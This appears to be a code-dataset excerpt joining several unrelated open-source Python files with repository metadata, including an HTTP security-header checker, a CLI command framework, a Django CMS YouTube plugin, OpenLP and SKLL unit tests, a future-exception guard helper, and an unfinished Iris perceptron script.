print "[+] CSP Header: Header not Empty"
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: " + str(header.getheaders('Content-Security-Policy')[0])
else:
print "[~] No CSP Header present"
if (debug):
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: Header not Empty"
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: " + str(header.getheaders('Strict-Transport-Security')[0])
else:
print "[-] No HSTS Header present"
return
def viewPage(url, agent, debug):
if ((url.startswith("http://") == False) and (url.startswith("https://") == False)):
url = "https://" + url
if (debug):
print "[+] Browsing : " +url.strip() +" As " + agent.strip()
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent',agent)]
browser.addheaders = [('Accept','test/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
browser.set_handle_refresh(False)
try:
page = browser.open(url.strip())
if (debug):
print "[+] Response Code: " +str(page.code)
return page.info()
finally:
return page.info()
def main():
# Options for the script
parser = optparse.OptionParser('Usage %prog% ' + " -u <url> -a <agent>")
parser.add_option('-u', dest='url', type='string', help='Specify the URL')
parser.add_option('-a', dest='agent', type='string', help='Specify the user agent')
parser.add_option('-d', dest='debug', action="store_true", default=False, help='Debug Mode')
(options, args) = parser.parse_args()
if (options.url == None):
print parser.usage
exit(0)
if (options.agent == None):
if (options.debug):
print "[-] No Useragent Set. Defaulting to Mozilla"
options.agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
header = viewPage(options.url, options.agent, options.debug)
validateHeaders(header, options.debug)
if __name__ == '__main__':
main()
| mit | -1,188,025,213,629,344,800 | 27.673684 | 100 | 0.647577 | false |
lukaszb/monolith | monolith/cli/base.py | 1 | 10479 | import os
import sys
import argparse
from collections import namedtuple
from monolith.compat import OrderedDict
from monolith.compat import unicode
from monolith.cli.exceptions import AlreadyRegistered
from monolith.cli.exceptions import CommandError
from monolith.utils.imports import get_class
Argument = namedtuple('Argument', 'args kwargs')
def arg(*args, **kwargs):
"""
Returns *Argument* namedtuple in format: ``(args, kwargs)``. In example::
>>> arg(1, 2, 'foo', 'bar')
Argument(args=(1, 2, 'foo', 'bar'), kwargs={})
>>> arg('a', 1, foo='bar')
Argument(args=('a', 1), kwargs={'foo': 'bar'})
"""
return Argument(args, kwargs)
class Parser(argparse.ArgumentParser):
"""
Subclass of ``argparse.ArgumentParser`` providing more control over output
stream.
"""
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stderr)
super(Parser, self).__init__(*args, **kwargs)
def _print_message(self, message, file=None):
if file is None:
file = self.stream
super(Parser, self)._print_message(unicode(message), file)
class ExecutionManager(object):
usage = None
completion = False
completion_env_var_name = ''
parser_cls = Parser
def __init__(self, argv=None, stderr=None, stdout=None):
if argv is None:
argv = [a for a in sys.argv]
self.prog_name = os.path.basename(argv[0])
self.argv = argv[1:]
self.registry = {}
self.stderr = stderr or sys.stderr
self.stdout = stdout or sys.stdout
for name, Command in self.get_commands_to_register().items():
self.register(name, Command)
def get_usage(self):
"""
Returns *usage* text of the main application parser.
"""
return self.usage
def get_parser(self):
"""
Returns :class:`monolith.cli.Parser` instance for this
*ExecutionManager*.
"""
parser = self.parser_cls(prog=self.prog_name, usage=self.get_usage(),
stream=self.stderr)
subparsers = parser.add_subparsers(
title='subcommands',
)
for name, command in self.registry.items():
cmdparser = subparsers.add_parser(name, help=command.help)
for argument in command.get_args():
cmdparser.add_argument(*argument.args, **argument.kwargs)
command.setup_parser(parser, cmdparser)
cmdparser.set_defaults(func=command.handle)
return parser
def register(self, name, Command, force=False):
"""
Registers given ``Command`` (as given ``name``) at this
*ExecutionManager*'s registry.
:param name: name in the registry under which given ``Command``
should be stored.
:param Command: should be subclass of
:class:``monolith.cli.base.BaseCommand``
:param force: Forces registration if set to ``True`` - even if another
command was already registered, it would be overridden and no
execption would be raised. Defaults to ``False``.
:raises AlreadyRegistered: If another command was already registered
under given ``name``.
"""
if not force and name in self.registry:
raise AlreadyRegistered('Command %r is already registered' % name)
command = Command(self.prog_name, self.stdout)
command.manager = self
self.registry[name] = command
command.post_register(self)
def get_commands(self):
"""
Returns commands stored in the registry (sorted by name).
"""
commands = OrderedDict()
for cmd in sorted(self.registry.keys()):
commands[cmd] = self.registry[cmd]
return commands
def get_commands_to_register(self):
"""
Returns dictionary (*name* / *Command* or string pointing at the
command class.
"""
return {}
def call_command(self, cmd, *argv):
"""
Runs a command.
:param cmd: command to run (key at the registry)
:param argv: arguments that would be passed to the command
"""
parser = self.get_parser()
args = [cmd] + list(argv)
namespace = parser.parse_args(args)
self.run_command(namespace)
def execute(self, argv=None):
"""
Executes command based on given arguments.
"""
if self.completion:
self.autocomplete()
parser = self.get_parser()
namespace = parser.parse_args(argv)
if hasattr(namespace, 'func'):
self.run_command(namespace)
def run_command(self, namespace):
try:
namespace.func(namespace)
except CommandError as err:
sys.stderr.write('ERROR: %s\n' % err.message)
sys.exit(err.code)
def autocomplete(self):
"""
If *completion* is enabled, this method would write to ``self.stdout``
completion words separated with space.
"""
if self.completion_env_var_name not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
current = cwords[cword-1]
except IndexError:
current = ''
cmd_names = self.get_commands().keys()
if current:
self.stdout.write(unicode(' '.join(
[name for name in cmd_names if name.startswith(current)])))
sys.exit(1)
class SimpleExecutionManager(ExecutionManager):
def __init__(self, program, commands):
"""
:param program: name of the program under which commands would be
executed (usually name of the program).
:param commands: dictionary mapping subcommands to proper command
classes. Values can be string - in that case proper command class
would be importer and used. Example::
{
'subcommand1': SomeCommand,
'subcommand2': 'myprogram.commands.another.AnotherCommand',
}
"""
self.simple_commands = commands
super(SimpleExecutionManager, self).__init__([program])
def get_commands_to_register(self):
"""
Returns dictionary with commands given during construction. If value is
a string, it would be converted into proper class pointer.
"""
return dict((key, get_class(value)) for key, value in
self.simple_commands.items())
class BaseCommand(object):
"""
Base command class that should be subclassed by concrete commands.
**Attributes**
- ``help``: Help description for this command. Defaults to empty string.
- ``args``: List of :class:`Argument` instances. Defaults to empty list.
- ``prog_name``: Program name of *ExecutionManager* within which this
command is run. Defaults to ``None``.
- ``stdout``: File-like object. Command should write to it. Defaults to
``sys.stdout``.
"""
help = ''
args = []
def __init__(self, prog_name=None, stdout=None):
self.prog_name = prog_name or ''
self.stdout = stdout or sys.stdout
def get_args(self):
"""
Returns list of :class:`Argument` instances for the parser. By default,
it returns ``self.args``.
"""
return self.args or []
def setup_parser(self, parser, cmdparser):
"""
This would be called when command is registered by ExecutionManager
after arguments from ``get_args`` are processed.
Default implementation does nothing.
:param parser: Global argparser.ArgumentParser
:param cmdparser: Subparser related with this command
"""
def handle(self, namespace):
"""
Handles given ``namespace`` and executes command. Should be overridden
at subclass.
"""
raise NotImplementedError
def post_register(self, manager):
"""
Performs actions once this command is registered within given
``manager``. By default it does nothing.
"""
pass
class LabelCommand(BaseCommand):
"""
Command that works on given position arguments (*labels*). By default, at
least one *label* is required. This is controlled by *labels_required*
attribute.
**Extra attributes**:
- ``labels_required``: If ``True``, at least one *label* is required,
otherwise no positional arguments could be given. Defaults to ``True``.
"""
labels_required = True
def get_labels_arg(self):
"""
Returns argument for *labels*.
"""
nargs = self.labels_required and '+' or '*'
return arg('labels', nargs=nargs)
def get_args(self):
return self.args + [self.get_labels_arg()]
def handle(self, namespace):
"""
Handles given ``namespace`` by calling ``handle_label`` method
for each given *label*.
"""
for label in namespace.labels:
self.handle_label(label, namespace)
else:
self.handle_no_labels(namespace)
def handle_label(self, label, namespace):
"""
Handles single *label*. Should be overridden at subclass.
"""
raise NotImplementedError
def handle_no_labels(self, namespace):
"""
Performs some action if no *lables* were given. By default it does
nothing.
"""
pass
class SingleLabelCommand(BaseCommand):
"""
Command that works on given positional argument (*label*).
**Extra arguments**:
- ``label_default_value``: If no *label* were given, this would be default
value that would be passed to ``namespace``. Defaults to ``None``.
"""
label_default_value = None
def get_label_arg(self):
"""
Returns argument for *label*.
"""
return arg('label', default=self.label_default_value, nargs='?')
def get_args(self):
return self.args + [self.get_label_arg()]
def handle(self, namespace):
"""
Calls ``handle_label`` method for given *label*.
"""
self.handle_label(namespace.label, namespace)
def handle_label(self, label, namespace):
"""
Handles *label*. Should be overridden at subclass.
"""
raise NotImplementedError
| bsd-2-clause | -1,535,403,399,572,830,500 | 30.280597 | 79 | 0.597958 | false |
jbazik/cmsplugin-video-youtube | cmsplugin_video_youtube/cms_plugins.py | 1 | 1467 | from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cmsplugin_video_youtube.models import YouTubeVideo
from cmsplugin_video_youtube.forms import YouTubeVideoForm
class YouTubeVideoPlugin(CMSPluginBase):
model = YouTubeVideo
name = _("YouTubeVideo")
render_template = "cmsplugin_video_youtube/embed.html"
form = YouTubeVideoForm
text_enabled = True
fieldsets = (
(None, {
'fields': ('name', 'video_id', 'width', 'height'),
}),
('Advanced Options', {
'classes': ('collapse',),
'fields': (
'fullscreen',
'autohide',
'autoplay',
'color',
'controls',
'iv_load',
'loop',
'modestbranding',
'playlist',
'related',
'showinfo',
'start',
'theme',
),
}),
)
def render(self, context, instance, placeholder):
context.update({
'object': instance,
'placeholder': placeholder
})
return context
def icon_src(self, instance):
return u"http://img.youtube.com/vi/%s/default.jpg" % instance.video_id
def icon_alt(self, instance):
return u"%s" % instance
plugin_pool.register_plugin(YouTubeVideoPlugin)
| lgpl-3.0 | 6,135,923,229,854,246,000 | 26.166667 | 78 | 0.537151 | false |
crossroadchurch/paul | tests/functional/openlp_core_common/test_applocation.py | 1 | 10285 | # -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
Functional tests to test the AppLocation class and related methods.
"""
import copy
import os
from unittest import TestCase
from openlp.core.common import AppLocation, get_frozen_path
from tests.functional import patch
FILE_LIST = ['file1', 'file2', 'file3.txt', 'file4.txt', 'file5.mp3', 'file6.mp3']
class TestAppLocation(TestCase):
"""
A test suite to test out various methods around the AppLocation class.
"""
def get_data_path_test(self):
"""
Test the AppLocation.get_data_path() method
"""
with patch('openlp.core.common.applocation.Settings') as mocked_class, \
patch('openlp.core.common.AppLocation.get_directory') as mocked_get_directory, \
patch('openlp.core.common.applocation.check_directory_exists') as mocked_check_directory_exists, \
patch('openlp.core.common.applocation.os') as mocked_os:
# GIVEN: A mocked out Settings class and a mocked out AppLocation.get_directory()
mocked_settings = mocked_class.return_value
mocked_settings.contains.return_value = False
mocked_get_directory.return_value = os.path.join('test', 'dir')
mocked_check_directory_exists.return_value = True
mocked_os.path.normpath.return_value = os.path.join('test', 'dir')
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_data_path()
# THEN: check that all the correct methods were called, and the result is correct
mocked_settings.contains.assert_called_with('advanced/data path')
mocked_get_directory.assert_called_with(AppLocation.DataDir)
mocked_check_directory_exists.assert_called_with(os.path.join('test', 'dir'))
self.assertEqual(os.path.join('test', 'dir'), data_path, 'Result should be "test/dir"')
def get_data_path_with_custom_location_test(self):
"""
Test the AppLocation.get_data_path() method when a custom location is set in the settings
"""
with patch('openlp.core.common.applocation.Settings') as mocked_class,\
patch('openlp.core.common.applocation.os') as mocked_os:
# GIVEN: A mocked out Settings class which returns a custom data location
mocked_settings = mocked_class.return_value
mocked_settings.contains.return_value = True
mocked_settings.value.return_value.toString.return_value = 'custom/dir'
mocked_os.path.normpath.return_value = 'custom/dir'
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_data_path()
# THEN: the mocked Settings methods were called and the value returned was our set up value
mocked_settings.contains.assert_called_with('advanced/data path')
mocked_settings.value.assert_called_with('advanced/data path')
self.assertEqual('custom/dir', data_path, 'Result should be "custom/dir"')
def get_files_no_section_no_extension_test(self):
"""
Test the AppLocation.get_files() method with no parameters passed.
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.os.listdir') as mocked_listdir:
# GIVEN: Our mocked modules/methods.
mocked_get_data_path.return_value = 'test/dir'
mocked_listdir.return_value = copy.deepcopy(FILE_LIST)
# When: Get the list of files.
result = AppLocation.get_files()
# Then: check if the file lists are identical.
self.assertListEqual(FILE_LIST, result, 'The file lists should be identical.')
def get_files_test(self):
"""
Test the AppLocation.get_files() method with all parameters passed.
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.os.listdir') as mocked_listdir:
# GIVEN: Our mocked modules/methods.
mocked_get_data_path.return_value = os.path.join('test', 'dir')
mocked_listdir.return_value = copy.deepcopy(FILE_LIST)
# When: Get the list of files.
result = AppLocation.get_files('section', '.mp3')
# Then: Check if the section parameter was used correctly.
mocked_listdir.assert_called_with(os.path.join('test', 'dir', 'section'))
# Then: check if the file lists are identical.
self.assertListEqual(['file5.mp3', 'file6.mp3'], result, 'The file lists should be identical.')
def get_section_data_path_test(self):
"""
Test the AppLocation.get_section_data_path() method
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.check_directory_exists') as mocked_check_directory_exists:
# GIVEN: A mocked out AppLocation.get_data_path()
mocked_get_data_path.return_value = os.path.join('test', 'dir')
mocked_check_directory_exists.return_value = True
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_section_data_path('section')
# THEN: check that all the correct methods were called, and the result is correct
mocked_check_directory_exists.assert_called_with(os.path.join('test', 'dir', 'section'))
self.assertEqual(os.path.join('test', 'dir', 'section'), data_path, 'Result should be "test/dir/section"')
def get_directory_for_app_dir_test(self):
"""
Test the AppLocation.get_directory() method for AppLocation.AppDir
"""
# GIVEN: A mocked out _get_frozen_path function
with patch('openlp.core.common.applocation.get_frozen_path') as mocked_get_frozen_path:
mocked_get_frozen_path.return_value = os.path.join('app', 'dir')
# WHEN: We call AppLocation.get_directory
directory = AppLocation.get_directory(AppLocation.AppDir)
# THEN: check that the correct directory is returned
self.assertEqual(os.path.join('app', 'dir'), directory, 'Directory should be "app/dir"')
def get_directory_for_plugins_dir_test(self):
"""
Test the AppLocation.get_directory() method for AppLocation.PluginsDir
"""
# GIVEN: _get_frozen_path, abspath, split and sys are mocked out
with patch('openlp.core.common.applocation.get_frozen_path') as mocked_get_frozen_path, \
patch('openlp.core.common.applocation.os.path.abspath') as mocked_abspath, \
patch('openlp.core.common.applocation.os.path.split') as mocked_split, \
patch('openlp.core.common.applocation.sys') as mocked_sys:
mocked_abspath.return_value = os.path.join('plugins', 'dir')
mocked_split.return_value = ['openlp']
mocked_get_frozen_path.return_value = os.path.join('plugins', 'dir')
mocked_sys.frozen = 1
mocked_sys.argv = ['openlp']
# WHEN: We call AppLocation.get_directory
directory = AppLocation.get_directory(AppLocation.PluginsDir)
# THEN: The correct directory should be returned
self.assertEqual(os.path.join('plugins', 'dir'), directory, 'Directory should be "plugins/dir"')
def get_frozen_path_in_unfrozen_app_test(self):
"""
Test the _get_frozen_path() function when the application is not frozen (compiled by PyInstaller)
"""
with patch('openlp.core.utils.sys') as mocked_sys:
# GIVEN: The sys module "without" a "frozen" attribute
mocked_sys.frozen = None
# WHEN: We call _get_frozen_path() with two parameters
frozen_path = get_frozen_path('frozen', 'not frozen')
# THEN: The non-frozen parameter is returned
self.assertEqual('not frozen', frozen_path, '_get_frozen_path should return "not frozen"')
def get_frozen_path_in_frozen_app_test(self):
"""
Test the get_frozen_path() function when the application is frozen (compiled by PyInstaller)
"""
with patch('openlp.core.common.sys') as mocked_sys:
# GIVEN: The sys module *with* a "frozen" attribute
mocked_sys.frozen = 1
# WHEN: We call _get_frozen_path() with two parameters
frozen_path = get_frozen_path('frozen', 'not frozen')
# THEN: The frozen parameter is returned
self.assertEqual('frozen', frozen_path, 'Should return "frozen"')
| gpl-2.0 | 8,223,613,109,412,259,000 | 51.47449 | 118 | 0.602333 | false |
ernfrid/skll | tests/test_classification.py | 1 | 12834 | # License: BSD 3 clause
"""
Tests related to classification experiments.
:author: Michael Heilman ([email protected])
:author: Nitin Madnani ([email protected])
:author: Dan Blanchard ([email protected])
:author: Aoife Cahill ([email protected])
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import csv
import glob
import itertools
import json
import os
from io import open
from os.path import abspath, dirname, exists, join
import numpy as np
from nose.tools import eq_, assert_almost_equal, raises
from sklearn.base import RegressorMixin
from skll.data import FeatureSet
from skll.data.writers import NDJWriter
from skll.config import _parse_config_file
from skll.experiments import run_configuration
from skll.learner import Learner
from skll.learner import _DEFAULT_PARAM_GRIDS
from utils import (make_classification_data, make_regression_data,
make_sparse_data, fill_in_config_paths_for_single_file)
_ALL_MODELS = list(_DEFAULT_PARAM_GRIDS.keys())
_my_dir = abspath(dirname(__file__))
def setup():
train_dir = join(_my_dir, 'train')
if not exists(train_dir):
os.makedirs(train_dir)
test_dir = join(_my_dir, 'test')
if not exists(test_dir):
os.makedirs(test_dir)
output_dir = join(_my_dir, 'output')
if not exists(output_dir):
os.makedirs(output_dir)
def tearDown():
train_dir = join(_my_dir, 'train')
test_dir = join(_my_dir, 'test')
output_dir = join(_my_dir, 'output')
config_dir = join(_my_dir, 'configs')
if exists(join(train_dir, 'train_single_file.jsonlines')):
os.unlink(join(train_dir, 'train_single_file.jsonlines'))
if exists(join(test_dir, 'test_single_file.jsonlines')):
os.unlink(join(test_dir, 'test_single_file.jsonlines'))
if exists(join(output_dir, 'rare_class.predictions')):
os.unlink(join(output_dir, 'rare_class.predictions'))
for output_file in glob.glob(join(output_dir, 'train_test_single_file_*')):
os.unlink(output_file)
config_file = join(config_dir, 'test_single_file.cfg')
if exists(config_file):
os.unlink(config_file)
def check_predict(model, use_feature_hashing=False):
"""
This tests whether predict task runs and generates the same
number of predictions as samples in the test set. The specified
model indicates whether to generate random regression
or classification data.
"""
# create the random data for the given model
if issubclass(model, RegressorMixin):
train_fs, test_fs, _ = \
make_regression_data(use_feature_hashing=use_feature_hashing,
feature_bins=5)
# feature hashing will not work for Naive Bayes since it requires
# non-negative feature values
elif model.__name__ == 'MultinomialNB':
train_fs, test_fs = \
make_classification_data(use_feature_hashing=False,
non_negative=True)
else:
train_fs, test_fs = \
make_classification_data(use_feature_hashing=use_feature_hashing,
feature_bins=25)
# create the learner with the specified model
learner = Learner(model.__name__)
# now train the learner on the training data and use feature hashing when
# specified and when we are not using a Naive Bayes model
learner.train(train_fs, grid_search=False)
# now make predictions on the test set
predictions = learner.predict(test_fs)
# make sure we have the same number of outputs as the
# number of test set samples
eq_(len(predictions), test_fs.features.shape[0])
# the runner function for the prediction tests
def test_predict():
for model, use_feature_hashing in \
itertools.product(_ALL_MODELS, [True, False]):
yield check_predict, model, use_feature_hashing
# the function to create data with rare labels for cross-validation
def make_rare_class_data():
"""
We want to create data that has five instances per class, for three labels
and for each instance within the group of 5, there's only a single feature
firing
"""
ids = ['EXAMPLE_{}'.format(n) for n in range(1, 16)]
y = [0] * 5 + [1] * 5 + [2] * 5
X = np.vstack([np.identity(5), np.identity(5), np.identity(5)])
feature_names = ['f{}'.format(i) for i in range(1, 6)]
features = []
for row in X:
features.append(dict(zip(feature_names, row)))
return FeatureSet('rare-class', ids, features=features, labels=y)
def test_rare_class():
"""
Test cross-validation when some labels are very rare
"""
rare_class_fs = make_rare_class_data()
prediction_prefix = join(_my_dir, 'output', 'rare_class')
learner = Learner('LogisticRegression')
learner.cross_validate(rare_class_fs,
grid_objective='unweighted_kappa',
prediction_prefix=prediction_prefix)
with open(prediction_prefix + '.predictions', 'r') as f:
reader = csv.reader(f, dialect='excel-tab')
next(reader)
pred = [row[1] for row in reader]
eq_(len(pred), 15)
def check_sparse_predict(learner_name, expected_score, use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
# train a logistic regression classifier on the training
# data and evalute on the testing data
learner = Learner(learner_name)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_sparse_predict():
for learner_name, expected_scores in zip(['LogisticRegression',
'DecisionTreeClassifier',
'RandomForestClassifier',
'AdaBoostClassifier',
'MultinomialNB',
'KNeighborsClassifier'],
[(0.45, 0.51), (0.5, 0.51),
(0.46, 0.46), (0.5, 0.5),
(0.44, 0), (0.51, 0.43)]):
yield check_sparse_predict, learner_name, expected_scores[0], False
if learner_name != 'MultinomialNB':
yield check_sparse_predict, learner_name, expected_scores[1], True
def check_sparse_predict_sampler(use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
if use_feature_hashing:
sampler = 'RBFSampler'
sampler_parameters = {"gamma": 1.0, "n_components": 50}
else:
sampler = 'Nystroem'
sampler_parameters = {"gamma": 1.0, "n_components": 50,
"kernel": 'rbf'}
learner = Learner('LogisticRegression',
sampler=sampler,
sampler_kwargs=sampler_parameters)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
expected_score = 0.44 if use_feature_hashing else 0.48999999999999999
assert_almost_equal(test_score, expected_score)
def test_sparse_predict_sampler():
yield check_sparse_predict_sampler, False
yield check_sparse_predict_sampler, True
def make_single_file_featureset_data():
"""
Write a training file and a test file for tests that check whether
specifying train_file and test_file actually works.
"""
train_fs, test_fs = make_classification_data(num_examples=600,
train_test_ratio=0.8,
num_labels=2,
num_features=3,
non_negative=False)
# Write training feature set to a file
train_path = join(_my_dir, 'train', 'train_single_file.jsonlines')
writer = NDJWriter(train_path, train_fs)
writer.write()
# Write test feature set to a file
test_path = join(_my_dir, 'test', 'test_single_file.jsonlines')
writer = NDJWriter(test_path, test_fs)
writer.write()
def test_train_file_test_file():
"""
Test that train_file and test_file experiments work
"""
# Create data files
make_single_file_featureset_data()
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'))
run_configuration(config_path, quiet=True)
# Check results
with open(join(_my_dir, 'output', ('train_test_single_file_train_train_'
'single_file.jsonlines_test_test_single'
'_file.jsonlines_RandomForestClassifier'
'.results.json'))) as f:
result_dict = json.load(f)[0]
assert_almost_equal(result_dict['score'], 0.925)
@raises(ValueError)
def test_train_file_and_train_directory():
"""
Test that train_file + train_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
train_directory='foo')
_parse_config_file(config_path)
@raises(ValueError)
def test_test_file_and_test_directory():
"""
Test that test_file + test_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
test_directory='foo')
_parse_config_file(config_path)
def check_adaboost_predict(base_estimator, algorithm, expected_score):
train_fs, test_fs = make_sparse_data()
# train an AdaBoostClassifier on the training data and evalute on the
# testing data
learner = Learner('AdaBoostClassifier', model_kwargs={'base_estimator': base_estimator,
'algorithm': algorithm})
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_adaboost_predict():
for base_estimator_name, algorithm, expected_score in zip(['MultinomialNB',
'DecisionTreeClassifier',
'SGDClassifier',
'SVC'],
['SAMME.R', 'SAMME.R',
'SAMME', 'SAMME'],
[0.45, 0.5, 0.45, 0.43]):
yield check_adaboost_predict, base_estimator_name, algorithm, expected_score
| bsd-3-clause | 3,986,852,876,339,038,700 | 38.489231 | 91 | 0.52883 | false |
mikhtonyuk/rxpython | concurrent/futures/cooperative/ensure_exception_handled.py | 1 | 3261 | import traceback
class EnsureExceptionHandledGuard:
"""Helper for ensuring that Future's exceptions were handled.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
called (and a helper object is present), it removes the the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _EnsureExceptionHandledGuard,
and then the _EnsureExceptionHandledGuard would be included in a cycle,
which is what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Since usually a Future has at least
one callback (typically set by 'yield from') and usually that
callback extracts the callback, thereby removing the need to
format the exception.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ['exc', 'tb', 'hndl', 'cls']
def __init__(self, exc, handler):
self.exc = exc
self.hndl = handler
self.cls = type(exc)
self.tb = None
def activate(self):
exc = self.exc
if exc is not None:
self.exc = None
self.tb = traceback.format_exception(exc.__class__, exc,
exc.__traceback__)
def clear(self):
self.exc = None
self.tb = None
def __del__(self):
if self.tb:
self.hndl(self.cls, self.tb)
| mit | -4,323,449,782,726,556,700 | 42.48 | 76 | 0.682306 | false |
bhedayat/Neural-Nets | Perceptron.py | 1 | 3593 |
# coding: utf-8
# In[22]:
#Flower Classifier with Perceptron
#Read in data
data = [] #training data
data1 = [] #test data
import numpy as np
import matplotlib.pyplot as plt
from random import randint
for line in file:
l = (line.split(","))
l[0] = float(l[0])
l[1] = float(l[1])
l[2] = float(l[2])
l[3] = float(l[3])
data.append (l)
for line1 in file1:
h = (line1.split(","))
h[0] = float(h[0])
h[1] = float(h[1])
h[2] = float(h[2])
h[3] = float(h[3])
data1.append (h)
#Label classes with numbers
for d in range(len(data)):
if data[d][4] == 'Iris-setosa\n':
data[d][4] = 0
elif data[d][4] == 'Iris-versicolor\n':
data[d][4] = 1
for d in range(len(data1)):
if data1[d][4] == 'Iris-setosa\n':
data1[d][4] = 0
elif data1[d][4] == 'Iris-versicolor\n':
data1[d][4] = 1
iris_data = np.array(data)
iris_test = np.array(data1)
#Normalize features with Z-score
for d in range(iris_data.shape[1]-1):
u = np.mean(iris_data[:,d])
s = np.std(iris_data[:,d])
iris_data[:,d] = (iris_data[:,d] - u)/s
iris_test[:,d] = (iris_test[:,d] - u)/s
#Scatter plots in different feature space
f1 = iris_data[:,0] #Sepal length
f2 = iris_data[:,1] #Sepal width
f3 = iris_data[:,2] #Petal length
f4 = iris_data[:,3] #Petal width
cluster = iris_data[:,4] #Flower class
plt.figure(1)
plt.scatter(f1[cluster==0],f2[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f2[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.title('Sepal length vs. Sepal width')
plt.figure(2)
plt.scatter(f1[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal length')
plt.title('Sepal length vs. Petal length')
plt.figure(3)
plt.scatter(f1[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal width')
plt.title('Sepal length vs. Petal width')
plt.figure(4)
plt.scatter(f2[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal length')
plt.title('Sepal width vs. Petal length')
plt.figure(5)
plt.scatter(f2[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal width')
plt.title('Sepal width vs. Petal width')
plt.figure(6)
plt.scatter(f3[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f3[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.title('Petal length vs. Petal width')
#plt.show()
#Append bias to data set
x = -1*np.ones((len(iris_data),1))
a_iris_data = np.concatenate((x, iris_data), 1)
y = -1*np.ones((len(iris_test),1))
a_iris_test = np.concatenate((y, iris_test), 1)
w = [0]*(len(a_iris_data[0])-1)
#Perceptron Gradient Descent
